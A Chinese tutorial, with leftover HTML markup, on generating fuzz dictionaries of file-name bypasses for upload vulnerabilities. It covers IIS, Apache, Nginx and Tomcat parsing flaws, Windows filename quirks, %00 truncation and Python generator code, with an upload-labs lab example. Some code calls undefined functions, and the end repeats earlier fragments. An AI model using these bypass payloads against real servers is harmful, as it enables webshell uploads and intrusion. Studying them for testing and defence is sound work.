上传漏洞Fuzz字典构造教学文档<\/h1>

一、上传漏洞概述<\/h2>
上传漏洞是Web安全中常见的高危漏洞，攻击者通过精心构造的上传文件名绕过服务器过滤机制，上传恶意脚本文件（如webshell）。利用方式因语言、中间件和操作系统的不同而有所差异。<\/p>

二、上传漏洞利用关键因素<\/h2>

可解析的后缀<\/strong>：不同语言有多个可解析后缀<\/li>
大小写混合<\/strong>：系统过滤不严时可能绕过<\/li>
中间件特性<\/strong>：各中间件特有的解析漏洞<\/li>
系统特性<\/strong>：特别是Windows系统的特殊处理<\/li>
语言漏洞<\/strong>：如%00截断漏洞<\/li>

双后缀<\/strong>：存在于代码逻辑中的绕过方式<\/li> <\/ol>
三、可解析后缀列表<\/h2>
ASP\/ASPX<\/h3>
asp, aspx, asa, asax, ascx, ashx, asmx, cer, aSp, aSpx, aSa, aSax, aScx, aShx, aSmx, cEr<\/code><\/p>
PHP<\/h3> php, php5, php4, php3, php2, pHp, pHp5, pHp4, pHp3, pHp2, html, htm, phtml, pht, Html, Htm, pHtml<\/code><\/p> JSP<\/h3> jsp, jspa, jspx, jsw, jsv, jspf, jtml, jSp, jSpx, jSpa, jSw, jSv, jSpf, jHtml<\/code><\/p> 四、大小写混合处理<\/h2> 字符串大小写混合函数<\/h3> def<\/span> str_case_mixing<\/span>(word): <\/span><\/span> str_list =<\/span> [] <\/span><\/span> word =<\/span> word.<\/span>lower() <\/span><\/span> tempWord =<\/span> copy.<\/span>deepcopy(word) <\/span><\/span> plist =<\/span> [] <\/span><\/span> redict =<\/span> {} <\/span><\/span> for<\/span> char in<\/span> range(len(tempWord)): <\/span><\/span> char =<\/span> word[char] <\/span><\/span> plist.<\/span>append(char) <\/span><\/span> num =<\/span> len(plist) <\/span><\/span> for<\/span> i in<\/span> range(num): <\/span><\/span> for<\/span> j in<\/span> range(i, num +<\/span> 1<\/span>): <\/span><\/span> sContent =<\/span> ''<\/span>.<\/span>join(plist[0<\/span>:i]) <\/span><\/span> mContent =<\/span> ''<\/span>.<\/span>join(plist[i:j]) <\/span><\/span> mContent =<\/span> mContent.<\/span>upper() <\/span><\/span> eContent =<\/span> ''<\/span>.<\/span>join(plist[j:]) <\/span><\/span> content =<\/span> '''<\/span>%s%s%s<\/span>'''<\/span> %<\/span> (sContent,mContent,eContent) <\/span><\/span> redict[content] =<\/span> None<\/span> <\/span><\/span> for<\/span> i in<\/span> redict.<\/span>keys(): <\/span><\/span> str_list.<\/span>append(i) <\/span><\/span> return<\/span> str_list <\/span><\/span><\/code><\/pre>列表大小写混合函数<\/h3> def<\/span> list_case_mixing<\/span>(li): <\/span><\/span> res =<\/span> [] <\/span><\/span> for<\/span> l in<\/span> li: <\/span><\/span> res +=<\/span> uperTest(l) <\/span><\/span> return<\/span> res <\/span><\/span><\/code><\/pre>五、中间件漏洞处理<\/h2> 1. IIS漏洞<\/h3> IIS6.0文件解析<\/strong>：xx.asp;.jpg<\/code><\/li> IIS6.0目录解析<\/strong>：xx.asp\/1.jpg<\/code>（与上传文件名无关）<\/li> IIS7.0畸形解析<\/strong>：xxx.jpg\/x.asp<\/code>（与上传文件名无关）<\/li> <\/ul> def<\/span> iis_suffix_creater<\/span>(suffix): <\/span><\/span> res =<\/span> [] <\/span><\/span> for<\/span> l in<\/span> suffix: <\/span><\/span> str =<\/span>'<\/span>%s<\/span>;.<\/span>%s<\/span>'<\/span> %<\/span> (l,allow_suffix) <\/span><\/span> res.<\/span>append(str) <\/span><\/span> return<\/span> res <\/span><\/span><\/code><\/pre>2. Apache漏洞<\/h3> %0a<\/code> (CVE-2017-15715)<\/li> 未知后缀：test.php.xxx<\/code><\/li> <\/ul> def<\/span> apache_suffix_creater<\/span>(suffix): <\/span><\/span> res =<\/span> [] <\/span><\/span> for<\/span> l in<\/span> suffix: <\/span><\/span> str =<\/span> '<\/span>%s<\/span>.xxx'<\/span> %<\/span> l <\/span><\/span> res.<\/span>append(str) <\/span><\/span> str =<\/span> '<\/span>%s%s<\/span>'<\/span> %<\/span> (l,urllib.<\/span>unquote('<\/span>%0a<\/span>'<\/span>)) #CVE-2017-15715<\/span> <\/span><\/span> res.<\/span>append(str) <\/span><\/span> return<\/span> res <\/span><\/span><\/code><\/pre>3. Nginx漏洞<\/h3> test.jpg\/xxx.php<\/code><\/li> test.jpg%00xxx.php<\/code> (CVE-2013-4547)<\/li> test.jpg(非编码空格)\0x.php<\/code><\/li> <\/ul> 4. Tomcat漏洞（仅Windows）<\/h3> xxx.jsp\/<\/code><\/li> xxx.jsp%20<\/code><\/li> xxx.jsp::$DATA<\/code><\/li> <\/ul> win_tomcat =<\/span> ['%20'<\/span>,'::$DATA'<\/span>,'\/'<\/span>] <\/span><\/span>def<\/span> tomcat_suffix_creater<\/span>(suffix): <\/span><\/span> res =<\/span> [] <\/span><\/span> for<\/span> l in<\/span> suffix: <\/span><\/span> for<\/span> t in<\/span> win_tomcat: <\/span><\/span> str =<\/span> '<\/span>%s%s<\/span>'<\/span> %<\/span> (l,t) <\/span><\/span> res.<\/span>append(str) <\/span><\/span> return<\/span> res <\/span><\/span><\/code><\/pre>5. .htaccess处理<\/h3> if<\/span> (middleware ==<\/span> 'apache'<\/span> or<\/span> middleware ==<\/span> 'all'<\/span>) and<\/span> (os ==<\/span> 'win'<\/span> or<\/span> os ==<\/span> 'all'<\/span>): <\/span><\/span> htaccess_suffix =<\/span> uperTest(".htaccess"<\/span>) <\/span><\/span>elif<\/span> (middleware ==<\/span> 'apache'<\/span> or<\/span> middleware ==<\/span> 'all'<\/span>) and<\/span> os ==<\/span> 'linux'<\/span>: <\/span><\/span> htaccess_suffix =<\/span> ['.htaccess'<\/span>] <\/span><\/span>else<\/span>: <\/span><\/span> htaccess_suffix =<\/span> [] <\/span><\/span><\/code><\/pre>六、语言、中间件与操作系统关系<\/h2> 语言<\/th> IIS<\/th> Apache<\/th> Tomcat<\/th> Windows<\/th> Linux<\/th> <\/tr> <\/thead> ASP\/ASPX<\/td> √<\/td> √<\/td> ×<\/td> √<\/td> √<\/td> <\/tr> PHP<\/td> √<\/td> √<\/td> √<\/td> √<\/td> √<\/td> <\/tr> JSP<\/td> √<\/td> ×<\/td> √<\/td> √<\/td> √<\/td> <\/tr> <\/tbody> <\/table> 七、系统特性处理<\/h2> Windows系统特性<\/h3> 文件名不区分大小写<\/li> ADS流特性：xxx.php::$DATA<\/code> = xxx.php<\/code><\/li> 文件名结尾特殊字符：.<\/code>, <\/code>, <<\/code>, ><\/code>, >>><\/code>, 0x81-0xff<\/code><\/li> <\/ul> def<\/span> str_81_to_ff<\/span>(): <\/span><\/span> res =<\/span> [] <\/span><\/span> for<\/span> i in<\/span> range(129<\/span>,256<\/span>): <\/span><\/span> str =<\/span> '<\/span>%x<\/span>'<\/span> %<\/span> i <\/span><\/span> str =<\/span> '%'<\/span> +<\/span> str <\/span><\/span> str =<\/span> urllib.<\/span>unquote(str) <\/span><\/span> res.<\/span>append(str) <\/span><\/span> return<\/span> res <\/span><\/span> <\/span><\/span>windows_os =<\/span> ['.'<\/span>,' '<\/span>,'>'<\/span>,'>>'<\/span>,'>>>'<\/span>,'%20'<\/span>,'%00'<\/span>] +<\/span> str_81_to_ff() <\/span><\/span> <\/span><\/span>def<\/span> windows_suffix_builder<\/span>(suffix): <\/span><\/span> res =<\/span> [] <\/span><\/span> for<\/span> s in<\/span> suffix: <\/span><\/span> for<\/span> w in<\/span> windows_os: <\/span><\/span> str =<\/span> '<\/span>%s%s<\/span>'<\/span> %<\/span> (s,w) <\/span><\/span> res.<\/span>append(str) <\/span><\/span> return<\/span> res <\/span><\/span><\/code><\/pre>八、语言漏洞处理<\/h2> %00截断和0x00截断<\/h3> def<\/span> str_00_truncation<\/span>(suffix,allow_suffix): <\/span><\/span> res =<\/span> [] <\/span><\/span> for<\/span> i in<\/span> suffix: <\/span><\/span> str =<\/span> '<\/span>%s%s<\/span>.<\/span>%s<\/span>'<\/span> %<\/span> (i,'%00'<\/span>,allow_suffix) <\/span><\/span> res.<\/span>append(str) <\/span><\/span> str =<\/span> '<\/span>%s%s<\/span>.<\/span>%s<\/span>'<\/span> %<\/span> (i,urllib.<\/span>unquote('%00'<\/span>),allow_suffix) <\/span><\/span> res.<\/span>append(str) <\/span><\/span> return<\/span> res <\/span><\/span><\/code><\/pre>九、双后缀处理<\/h2> def<\/span> str_double_suffix_creater<\/span>(suffix): <\/span><\/span> res =<\/span> [] <\/span><\/span> for<\/span> i in<\/span> range(1<\/span>,len(suffix)): <\/span><\/span> str =<\/span> list(suffix) <\/span><\/span> str.<\/span>insert(i,suffix) <\/span><\/span> res.<\/span>append(""<\/span>.<\/span>join(str)) <\/span><\/span> return<\/span> res <\/span><\/span> <\/span><\/span>def<\/span> list_double_suffix_creater<\/span>(list_suffix): <\/span><\/span> res =<\/span> [] <\/span><\/span> for<\/span> l in<\/span> list_suffix: <\/span><\/span> res +=<\/span> double_suffix_creater(l) <\/span><\/span> return<\/span> duplicate_removal(res) <\/span><\/span><\/code><\/pre>十、工具使用<\/h2> upload-fuzz-dic-builder.py参数说明<\/h3> usage: upload-fuzz-dic-builder [-h] [-n] [-a] [-l] [-m] [--os] [-d] [-o] optional arguments: -h, --help show this help message and exit -n , --upload-filename Upload file name -a , --allow-suffix Allowable upload suffix -l , --language Uploaded script language -m , --middleware Middleware used in Web System --os Target operating system type -d, --double-suffix Is it possible to generate double suffix? -o , --output Output file <\/code><\/pre> 使用示例<\/h3> python upload-fuzz-dic-builder.py -l php -m apache --os win <\/span><\/span><\/code><\/pre>十一、实战案例（upload-labs Pass-09）<\/h2> 生成fuzz字典：<\/li> <\/ol> python upload-fuzz-dic-builder.py -l php -m apache --os win <\/span><\/span><\/code><\/pre>输出：<\/p> [+] 收集17条可解析后缀完毕! [+] 加入145条可解析后缀大小写混合完毕! [+] 加入152条中间件漏洞完毕! [+] 加入37条.htaccess完毕! [+] 加入10336条系统特性完毕! [+] 去重后共10753条数据写入upload_fuzz_dic.txt文件 <\/code><\/pre> 使用Burp Suite的Intruder模块对上传名称进行fuzz<\/p> <\/li> 分析fuzz结果，找出可用的payload<\/p> <\/li> <\/ol> 十二、总结<\/h2> 通过分析上传漏洞的各个影响因素，可以构造针对性的fuzz字典，大大提高发现可用payload的效率。关键点包括：<\/p> 准确识别目标系统的语言、中间件和操作系统<\/li> 根据识别结果选择相应的生成规则<\/li> 使用工具自动化生成测试字典<\/li> 结合Burp Suite等工具进行高效fuzz测试<\/li> <\/ol>

上传漏洞Fuzz字典构造教学文档<\/h1>

一、上传漏洞概述<\/h2> 上传漏洞是Web安全中常见的高危漏洞，攻击者通过精心构造的上传文件名绕过服务器过滤机制，上传恶意脚本文件（如webshell）。利用方式因语言、中间件和操作系统的不同而有所差异。<\/p>

三、可解析后缀列表<\/h2>

ASP\/ASPX<\/h3> asp, aspx, asa, asax, ascx, ashx, asmx, cer, aSp, aSpx, aSa, aSax, aScx, aShx, aSmx, cEr<\/code><\/p>

五、中间件漏洞处理<\/h2>

七、系统特性处理<\/h2>

八、语言漏洞处理<\/h2>

十、工具使用<\/h2>

一、上传漏洞概述<\/h2>
上传漏洞是Web安全中常见的高危漏洞，攻击者通过精心构造的上传文件名绕过服务器过滤机制，上传恶意脚本文件（如webshell）。利用方式因语言、中间件和操作系统的不同而有所差异。<\/p>

ASP\/ASPX<\/h3>
`asp, aspx, asa, asax, ascx, ashx, asmx, cer, aSp, aSpx, aSa, aSax, aScx, aShx, aSmx, cEr<\/code><\/p>`